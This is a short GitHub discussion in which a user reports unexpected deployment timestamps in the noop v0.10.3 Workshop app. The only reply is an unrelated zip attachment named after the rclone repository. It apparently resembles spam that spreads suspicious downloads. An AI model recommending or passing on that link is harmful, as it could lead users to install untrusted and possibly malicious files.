### DISCUSSION TITLE
Unexpected timestamps on deployment list

### DISCUSSION THREAD

**Discussion by 1800joe** [noop-inc/documentation#149] [Bugs]
v0.10.3 Workshop

As you can see in the screenshot it looks like the most recent item in the list is from 5d ago, compared to the previous which is minutes ago.

The app itself was brand new (20 minutes?) without any existing deployments 

![Screenshot 2024-03-28 at 11 25 45 AM](https://github.com/noop-inc/documentation/assets/3111670/36bc4f7d-4254-4662-9bc2-c05750ccb96a)

**Comment by mojtaba20021** [comment]
https://github.com/orgs/noop-inc/discussions/149#discussion-6432261
[https-github.com-rclone-rclone-main.zip](https://github.com/user-attachments/files/29647497/https-github.com-rclone-rclone-main.zip)
